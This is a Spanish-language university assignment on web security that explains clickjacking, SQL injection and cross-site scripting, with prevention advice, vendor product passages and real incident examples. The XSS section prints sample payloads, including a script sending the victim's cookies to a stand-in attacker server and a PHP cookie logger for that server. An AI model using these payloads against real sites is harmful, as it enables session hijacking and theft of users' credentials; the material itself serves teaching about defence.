Sunteți pe pagina 1din 14

SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

UNIVERSIDAD DE CARTAGENA

ASIGNATURA:
SEGURIDAD DE SOFTWARE

ACTIVIDAD N°1

PROGRAMA:
INGENIERIA DE SOFTWARE
VII SEMESTRE

INTEGRANTES:
GERVIS PAJARO PAJARO
JEINER MANGONES ANAYA
FIDEL HERNANDEZ ALTAMIRANDA

TUTOR:
MARTIN INDABURO

CENTRO TUTORIAL LORICA

2020
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

A partir de lo estudiado en la unidad 1 y de lo que usted complemente de


manera independiente, realice una descripción detallada de 3
vulnerabilidades frecuentes de las aplicaciones WEB. Describa con claridad
como se generan, causas, características y argumente como se pueden
evitar. Además, consulte en Internet casos reales para cada tipo de
vulnerabilidad.
Como todos saben, cualquier investigador experimentado o simplemente un
hacker con gran recorrido en la materia pueden hacer uso de sus conocimientos
para encontrar los errores de una web y vulnerarlo con técnicas empleadas. Es
por ello que en este artículo te comentaremos cuáles son las vulnerabilidades más
comunes que pueden llegar a tener los sitios en Internet.
Para nadie es un secreto que en la actualidad existen sistemas de seguridad que
sirven para proteger la integridad de una página web de las amenazas que pueden
haber en el ciberespacio, sin embargo, los piratas informáticos se valen de sus
conocimientos para lograr acceder a los sitios sin ser descubiertos.
En este sentido, es de gran importancia que los desarrolladores y administradores
web conozcan en gran medida cómo se llevan a cabo esto ataques y en qué forma
pueden evitarlos. Es relevante conocer que además de sistemas de seguridad,
también existen infinidades de aplicaciones web que ayudan en esta tarea que
puede acabar con una web en cuestiones de segundos.
En el siguiente artículo comentaremos algunos de los puntos más sobresalientes
que han sido investigados por los expertos en la materia y que se encontraron en
diferentes informes arrojados por las grandes empresas de seguridad en Internet.
3 vulnerabilidades frecuentes de las aplicaciones WEB
CLICKJACKING
El mundo digital está lleno de cosas fascinantes y útiles; pero también está
plagado de peligros que aumentan y se diversifican de forma exponencial a
medida que avanza la tecnología. De esas amenazas, entre las más comunes se
encuentra el clickjacking; una técnica maliciosa capaz de introducirse en los
sistemas de forma furtiva y permitir, entre otras cosas, el robo de información
sensible de usuarios y empresas.
Aunque las consecuencias de un ataque de clickjacking pueden muchas veces ser
leves; se ha demostrado que sus alcances pueden llegar a comprometer de forma
importante la seguridad del sistema en el que se introduce. Por ello, conocer su
funcionamiento, así como algunas mejores prácticas de prevención; es vital para
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

evitar convertirse en una víctima de esta técnica maliciosa. Sigue leyendo y


entérate de todo lo que necesitas saber acerca de esta amenaza del ciberespacio.

Qué es exactamente el Clickjacking


El Clickjacking también llamado UI Redressing, es una técnica maliciosa destinada
a persuadir a un usuario de Internet a dar click en enlaces aparentemente
seguros; pero que tienen como objetivo brindarle la oportunidad al hacker de robar
información o tomar el control del ordenador del usuario.
En otras palabras, es una forma de piratería informática maliciosa que le da la
oportunidad al atacante de tener acceso a datos sensibles; instalar malwares o, en
algunos casos, crear PCs «zombies». En el peor de los casos, el cibercriminal
puede obtener el control de servicios vitales de una empresa para lograr
beneficios económicos a través de la extorsión.
Cuando aplican el clickjacking, los atacantes a menudo utilizan marcos ocultos
para robar información. Aunque no es una técnica nueva; los hackers se esfuerzan
en encontrar medios innovadores para engañar a los usuarios. Por lo que no
dudan en utilizar su dominio de la web; sus conocimientos relacionados con el
comportamiento de los internautas y las nuevas tecnologías (html5, display none,
etc.), para perfeccionar sus técnicas maliciosas.
Cómo Funciona
Los cibercriminales detrás del clickjacking tienden a proceder de la siguiente
manera:
1. Localiza páginas vulnerables, en las que se invite a los usuarios a realizar
alguna acción a través de un enlace o botón.
2. Integra en esta página un código malicioso de otra página que él mismo
domina.
Existen muchas formas a través de las cuales estos hackers pueden engañar al
usuario, por ejemplo; pueden utilizar las propiedades de estilo ofrecidas por
HTML/CSS para hacer que la página vulnerable sea transparente.
Los ejemplos más comunes de ataques de clickjacking son likejacking y tweet
bomb. La primera, dirigida a la red social, tiene como objetivo hacer que una
página aumente su popularidad. La segunda está orientada a transmitir de forma
masiva un mensaje en Twitter, la mayoría de las veces con publicidad.
Sin embargo, un ataque de clickjacking también puede traer consigo un riesgo
considerable para las aplicaciones de las empresas que manejen datos sensibles.
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

Cómo Protegerse Efectivamente Del Clickjacking


Más que cualquier error interno de los sistemas, son los usuarios quienes
representan la puerta de entrada más común para este tipo de ataques. Sobre
todo, aquellos que son más “ingenuos” tecnológicamente. 
Esto quiere decir que independientemente de si una empresa cuenta con lo último
en tecnología de seguridad; siempre puede existir algún usuario mal informado
que permita la intrusión de algún elemento malicioso. Es por eso que aplicar
medidas preventivas es vital a la hora de mantener los sistemas protegidos. Entre
esas medidas tenemos:
1 comienza por el navegador
Incluso durante sus actividades normales, los miembros de la empresa pueden
convertirse en víctimas de este tipo de ataques. Es por eso que, como medida de
prevención, lo más recomendable es que comiences por proteger el navegador.
Instala complementos como NoScript y NotScript. Los mismos son capaces de
permitir que los usuarios identifiquen los dominios confiables. Es importante que
antes de ejecutar cualquier medida, realices una campaña de concienciación entre
los miembros de la empresa. Esto le permitirá estar al tanto de las estrategias de
seguridad y promoverá una cultura de colaboración más eficiente a la hora de
prevenir cualquier tipo de ataques.
2 instala una herramienta de seguridad de aplicaciones web
Parece una medida bastante obvia, sin embargo, para muchas empresas no lo es.
Algunas organizaciones siguen sin integrar en sus sistemas soluciones que les
permitan proteger de forma automática sus activos digitales.
 
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

 
Esto representa una gran ventaja para los cibercriminales pues disminuye la
cantidad de esfuerzos que deben hacer para infiltrarse en un sistema. Para evitar
ser una víctima más; lo esencial es instalar una herramienta que brinde seguridad
a las aplicaciones web aun cuando los equipos de TI no estén activos. Una
excelente opción en este caso es la solución Tenable.io. Capaz de proteger tanto
aplicaciones web, como activos en la nube y contenedores informáticos.
3 Utiliza las opciones X-Frames
La mayoría de los navegadores comunes, incluyendo Microsoft IE, Google
Chrome; Apple Safari y Firefox, soportan la opción HTTP Header X-FRAME-
OPTIONS. La misma permite especificar si el navegador debe permitir o no que un
navegador muestre una página en una etiqueta <frame>, <iframe> u <object>.
Ya lo ves, son estrategias simples pero efectivas. Procura aplicarlas todas para
garantizar la protección efectiva de tus sistemas. Si quieres más información
acerca de las mejores herramientas de seguridad IT, no dudes en contactarnos.
En GB Advisors nos esforzamos por ayudar a nuestros clientes a tener entornos
de TI eficientes y seguros.

2 Ataques De Inyección SQL


Los ataques de inyección SQL aprovechan errores de diseño habituales en las
aplicaciones web y sigue siendo un método fácil y eficaz de ataque cibernético. La
amenaza de las inyecciones SQL representa un grave problema de seguridad
relacionado con bases de datos para las organizaciones, ya que actualmente es el
vector de ataque de uso más extendido entre los piratas informáticos para poner
en peligro los sitios web. Los grupos de hacktivistas como el Ejército Electrónico
Sirio son conocidos por el uso de herramientas de vulneración de inyecciones SQL
para sabotear e infiltrar propiedades online, así como para distribuir malware.
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

Los peligros de un ataque de inyección SQL


Capaz de atacar a sitios web externos o a bases de datos internas, los ataques de
inyección SQL son empleados por los ciberdelincuentes para manipular, robar o
destruir datos. Aprovechándose de las vulnerabilidades en el nivel de la base de
datos de una aplicación, los piratas informáticos son capaces de inyectar
consultas SQL maliciosas en el campo de entrada de una página web, engañar a
la aplicación para que ejecute comandos no intencionados y penetrar en la base
de datos especializada. Un ataque de inyección SQL puede ralentizar el
rendimiento de las aplicaciones, el robo, la pérdida o la corrupción de datos,
denegación de acceso o incluso la toma del control absoluto del servidor.

Prevención de un ataque de inyección SQL en sus aplicaciones web


Mientras las empresas se esfuerzan por ofrecer sitios web interactivos y atractivos,
la base de datos (un componente clave de cualquier aplicación basada en web
que ofrezca contenido dinámico) se convierte en un objetivo útil a la hora de atacar
todo tipo de empresas y organizaciones. Afortunadamente, hay maneras de evitar
un ataque de inyección SQL:
Los diseñadores de aplicaciones web deben familiarizarse con el funcionamiento
interno de los ataques de inyección SQL a través de un tutorial de inyección SQL
online con el fin de evitar errores de codificación, adoptar una técnica de
validación de entrada adecuada y reforzar las instrucciones SQL.
Los departamentos de TI deben actualizar e instalar parches en los servidores y
aplicaciones con la mayor asiduidad posible, emplear sistemas de prevención de
intrusos y tecnologías de supervisión de bases de datos, así como implementar las
aplicaciones y las pruebas de penetración en la red para hacer frente a las
vulnerabilidades.
Las organizaciones pueden aprovechar el potencial de un firewall de aplicaciones
web basado en la nube, el mejor método de defensa frente a los ataques de
inyección SQL y la manera más asequible de evitar que un gran número de
ciberataques tengan por objetivo el nivel de aplicación.
Atenuación de los riesgos de los ciberataques mediante el uso de un firewall de
aplicaciones web
Un firewall de aplicaciones web (WAF) ayuda a proteger sus servidores y
aplicaciones web mediante la inspección del nivel HTTP y el uso de patrones para
identificar, aislar y bloquear el tráfico anormal o malicioso. Kona Site Defender de
Akamai, una potente solución de seguridad web implementada en línea en la
plataforma global Akamai Intelligent Platform, no solo defiende sus aplicaciones
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

web con un WAF completo y altamente escalable, sino que además reduce el
riesgo de sufrir ataques distribuidos de denegación de servicio (DDoS) a gran
escala. Al incorporar controles sofisticados en el nivel de aplicaciones, nuestro
WAF basado en la nube permite realizar una inspección profunda de paquetes de
HTTP/S, garantizando la seguridad de capa de sockets seguros (SSL) de sus
transacciones a la vez que evita el abuso del tráfico HTTPS como el ataque
BREACH. Dado que nuestras soluciones se despliegan en los límites de Internet,
podemos detectar y detener el tráfico sospechoso antes de que llegue a sus
servidores, sin poner en riesgo el rendimiento y la disponibilidad.
3 Cross-site scripting (XSS)
Una secuencia de comandos en sitios cruzados o Cross-site scripting (XSS por
sus siglas en idioma inglés) es un tipo de vulnerabilidad informática o agujero de
seguridad típico de las aplicaciones Web, que puede permitir a una tercera
persona inyectar en páginas web visitadas por el usuario código JavaScript o en
otro lenguaje similar (ej: VBScript). Se puede evitar usando medidas como CSP,
política del mismo origen, etcétera.

Es posible encontrar una vulnerabilidad de Cross-Site Scripting en aplicaciones


que tengan entre sus funciones presentar la información en un navegador web u
otro contenedor de páginas web. Sin embargo, no se limita a sitios web
disponibles en Internet, ya que puede haber aplicaciones locales vulnerables a
XSS, o incluso el navegador en sí.
Mecanismo de ataque
XSS es un vector de ataque que puede ser utilizado para robar información
delicada, secuestrar sesiones de usuario, y comprometer el navegador,
subyugando la integridad del sistema. Las vulnerabilidades XSS han existido
desde los primeros días de la Web.
Esta situación es habitualmente causada al no validar correctamente los datos de
entrada que son usados en cierta aplicación, o no sanear la salida adecuadamente
para su presentación como página web.
Esta vulnerabilidad puede estar presente de las siguientes formas:
Directa (también llamada Persistente): este tipo de XSS comúnmente filtrado, y
consiste en insertar código HTML peligroso en sitios que lo permitan; incluyendo
así etiquetas como <script> o <iframe>.
Indirecta (también llamada Reflejada): este tipo de XSS consiste en modificar
valores que la aplicación web utiliza para pasar variables entre dos páginas, sin
usar sesiones y sucede cuando hay un mensaje o una ruta en la URL del
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

navegador, en una cookie, o cualquier otra cabecera HTTP (en algunos


navegadores y aplicaciones web, esto podría extenderse al DOM del navegador).
XSS Indirecto (reflejado)
Supongamos que un sitio web tiene la siguiente forma:
http://www.example.com/home.asp?frame=menu.asp
y que al acceder se creará un documento HTML enlazando con un frame a
menu.asp.
En este ejemplo, ¿qué pasaría si se pone como URL del frame un código
javascript?
javascript: while(1)alert("Este mensaje saldrá indefinidamente");
Si este enlace lo pone un atacante hacia una víctima, un visitante podrá verlo y
verá que es del mismo dominio, suponiendo que no puede ser nada malo y de
resultado tendrá un bucle infinito de mensajes.
Un atacante en realidad trataría de colocar un script que robe las cookies de la
víctima, para después poder personificarse como con su sesión, o hacer
automático el proceso con el uso de la biblioteca cURL o alguna similar. De esta
forma, al recibir la cookie, el atacante podría ejecutar acciones con los permisos
de la víctima sin siquiera necesitar su contraseña.
Otro uso común para estas vulnerabilidades es lograr hacer phishing. Quiere ello
decir que la víctima ve en la barra de direcciones un sitio, pero realmente está en
otra. La víctima introduce su contraseña y se la envía al atacante.
Una página como la siguiente:
error.php?error=Usuario%20Invalido
es probablemente vulnerable a XSS indirecto, ya que, si escribe en el documento
"Usuario Inválido", esto significa que un atacante podría insertar HTML y
JavaScript si así lo desea.
Por ejemplo, un tag como <script> que ejecute código javascript, cree otra sesión
bajo otro usuario y mande la sesión actual al atacante.
Para probar vulnerabilidades de XSS en cookies, se puede modificar el contenido
de una cookie de forma sencilla, usando el siguiente script. Sólo se debe colocar
en la barra de direcciones, y presionar 'Enter'.

javascript:voidprompt("Introduce la cookie:",document.cookie).replace(/[^;]
+/g,function(_){document.cookie=_;});
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

XSS Directo (persistente)


Funciona localizando puntos débiles en la programación de los filtros de HTML si
es que existen, para publicar contenido (como blogs, foros, etc.).
Normalmente el atacante tratara de insertar tags como <iframe>, o <script>, pero
en caso de fallar, el atacante puede tratar de poner tags que casi siempre están
permitidas y es poco conocida su capacidad de ejecutar código. De esta forma el
atacante podría ejecutar código malicioso.

Ejemplos: Una posibilidad es usar atributos que permiten ejecutar código.

<BR STYLE="behavior: url(http://yoursite/xss.htc);">


<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<IMG SRC=X ONERROR="alert(/XSS/)">

AJAX
Usar AJAX para ataques de XSS no es tan conocido, pero sí peligroso. Se basa
en usar cualquier tipo de vulnerabilidad de XSS para introducir un objeto XMLHttp
y usarlo para enviar contenido POST, GET, sin conocimiento del usuario.
Este se ha popularizado con gusanos de XSS que se encargan de replicarse por
medio de vulnerabilidades de XSS persistentes (aunque la posibilidad de usar
XSS reflejados es posible).
El siguiente script de ejemplo obtiene el valor de las cookies y seguidamente las
enviaría al atacante.
Javascript:
var cookiesDeUsuario = document.cookie;

var xhr = new XMLHttpRequest(); // Objeto Ajax


xhr.open('GET', 'www.servidor-atacante.com/cookies.php');
xhr.send('c=' + cookiesDeUsuario);
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

PHP (servidor del atacante):

<?php
$archivo = fopen('log2.htm','a');

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');


$re = $HTTPREFERRER;

$fecha=date ("j F, Y, g:i a");

fwrite($archivo, '<br />Cookie: '.htmlentities($cookie).'<br />Página:


'.htmlentities($re));
fwrite ($archivo, '<br /> IP: ' .$ip. '<br /> Fecha y Hora: ' .$fecha. '</hr>');

fclose($archivo);

?>

Casos Reales De Cada Una De Las Vulnerabilidades


CLICKJACKING
Imaginemos un sistema de votación
muy sencillo, alojado en un dominio cualquiera, en la web vulnerable.php.

El atacante utiliza test.html, que carga mediante un iframe la página


vulnerable.php de forma transparente con 0 capacidad 0. La carga “por delante”
de test.htm, pero al ser transparente, el usuario solo visualiza el contenido de
test.html. En ella propone votar a otra web cualquiera, por ejemplo
elladodelmal.com. Este es el reclamo. Pero el usuario que pulse sobre el botón,
realmente estará votando a elevenpaths.com.
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

La última secuencia muestra una imagen de la aplicación test.htm con opacidad 1,


lo
que significa que se puede ver la aplicación vulnerable.php y test.php claramente
una sobre la otra.
Evitar el ataque: en un sitio web
¿Qué
puede hacer una página para que no sea utilizada como víctima del clickjacking?
No puede hacer mucho más que evitar que se cargue ella misma dentro de un
iframe. Así ningún atacante podrá ponerla “invisible” y sobre otra que el propio
atacante ha creado. Una de las soluciones “antiguas”
era la de evitar con JavaScript que una página no estuviera siempre en el
“top”.
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

Se
debería incluir este código en cada página. Pero estas técnicas podían, a su
vez, ser evitadas por el atacante.
Como
solución más práctica, se ideó añadir al protocolo HTTP una cabecera llamada X-
Frame-Options.
Las páginas que envíen estas cabeceras al navegador, pretenden protegerse de
aparecer en un iframe. Se propusieron varios métodos más o menos flexibles para
intentar ayudar a las que legítimamente necesitaran incluirse dentro de un iframe.
Sus valores son:

 DENY,
el navegador evita que la página sea rende rizada si está contenida
dentro de un iframe
 SAMEORIGIN, la página solo puede ser mostrara en un Frame que
provenga del mismo origen que la propia página.
 ALLOW-FROM uri, el navegador bloqueará la
renderización sólo si el origen de nivel superior está en un contexto de
navegación que es diferente al valor uri proporcionado en la directiva 

Los usuarios deben confiar en que las páginas las envíen, y que su navegador las
interprete correctamente. Esto último hace tiempo que ya lo implementan la
mayoría. Por ejemplo, Chrome desde su versión 4.1.249.1042, Firefox desde
3.6.9,
Internet Explorer desde la 8, Opera desde la 10.5…
Evitar el ataque: desde el
cliente
Pero aunque la mayoría de
páginas  ya se aprovechan de estas cabeceras, ¿qué pasa con las que no?
El usuario debe protegerse. Ciertos antivirus detectan en el navegador
comportamientos
“extraños” de este tipo, y les han asignado firmas. Por ejemplo
Avira, lo detecta como 
HTML/Infected.WebPage.Gen2. 

Ataques de inyección SQL


SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

Durante las últimas dos décadas, un gran número de ataques de inyección SQL
han sido dirigidos hacia grandes páginas web, empresas y plataformas de redes
sociales. Algunos de estos ataques han resultado en grandes filtraciones de datos.
Algunos de los ejemplos más notorios incluyen los siguientes:
 En 2008, dos hackers nacidos en Rusia usaron técnicas de inyección SQL
para atacar Heartland Payment Systems, un proveedor entonces exitoso de
soluciones de tramitación de pagos. Clasificada como la filtración de datos de
tarjetas de crédito más grande hasta el momento, el ataque dio a los hackers
acceso a la información de más de 150 millones de tarjetas de crédito y costó a la
empresa afectada más de 300 millones de dólares. En 2018, los hackers fueron
condenados a una sentencia conjunta de más de 16 años.
 En 2016, un grupo de hackers explotó las vulnerabilidades de vBulletin, un
popular software de tablón de mensajería online, para atacar a 11 tableros de
mensajes dedicados a los juegos, la mayoría de ellos en ruso. Durante el ataque,
los hackers consiguieron robar datos de registro de más de 27 millones de
cuentas.
 También en 2016, los hackers usaron métodos de inyección SQL para
lanzar un ciber ataque contra el banco nacional de Qatar. Los hackers
consiguieron robar más de 1.4 GB de datos, que fueron publicados poco después.
Estos datos implicaban la información de cuentas de miles de clientes, incluidos
los miembros de la familia real del país, oficiales de la inteligencia, polémicos
líderes religiosos, así como varios ciudadanos británicos, franceses y
estadounidenses que estaban indicados como espías en la base de datos del
banco

Cross-Site Scripting (XSS)


En octubre del 2005, el gusano Sammy, el primer gusano XSS de importancia
obligó a MySpace a apagar sus servidores. La carga que generaba en el servidor
era relativamente benigna, este gusano fue diseñado para esparcirse a través de
los perfiles de los usuarios hasta llegar a infectar a más de un millón de usuarios
en solo 24 horas (Grossman, 2007)
SEGURIDAD DE SOFTAWARE INGENIERIA DE SOFTWARE

El 11 de agosto de 2007, un blog publicó el código del índice principal de


Facebook obtenido a través de un ataque XSS, aunque no se dijeron los detalles
(Egeberg, 2008). El 20 de diciembre del 2008, el sitio web de American Express
fue expuesto al encontrarse bugs de seguridad que pudieron haber permitido el
acceso a la base de datos de los clientes y robado sus credenciales de acceso. El
error de XSS continuó activo durante 2 semanas (Goodin, 2008). En el sitio web
de PayPal fue detectado en febrero de 2009 un bug de XSS el cual pudo ser
usado para robar contraseñas de los usuarios y cookies autentificadas (Goodin,
2009). 30 de marzo del 2011, se descubrieron brechas de seguridad XSS en
varios sitios de McAfee. 13 de octubre del 2010, la central de ventas de Amazon
ha reportado una vulnerabilidad grave de XSS. 6 de octubre de 2010, PayPal
vulnerable de XSS. 6 de octubre de 2010, se reportó que eBay tiene un XSS
persistente que inyecta un iframe que roba las credenciales de los usuarios, etc.,
etc. (Xssed, 2011), y así continúa la lista de muchos sitios en los cuales se ha
encontrado vulnerabilidades XSS. En abril de 2011 Facebook fue víctima de 3
ataques con XSS que estuvieron activos durante un periodo de 10 días
(Theharmonyguy, 2011):
• El primero fue solo una redirección que realizó un blogger para demostrar la
vulnerabilidad de la aplicación de Facebook para móviles.
• El segundo ataque introducía una forma en los muros de los usuarios y se
reproducía de forma viral con solo un clic, pero igualmente no hacía ningún daño.
• El tercero introducía un video a través del código de las aplicaciones que permite
Facebook, pero si identificaba que aún el usuario no estaba logueado cargaba una
página falsa de inicio de sesión muy parecida a la de Facebook y mandaba
nombre de usuario y contraseña a un log en el servidor del atacante.

S-ar putea să vă placă și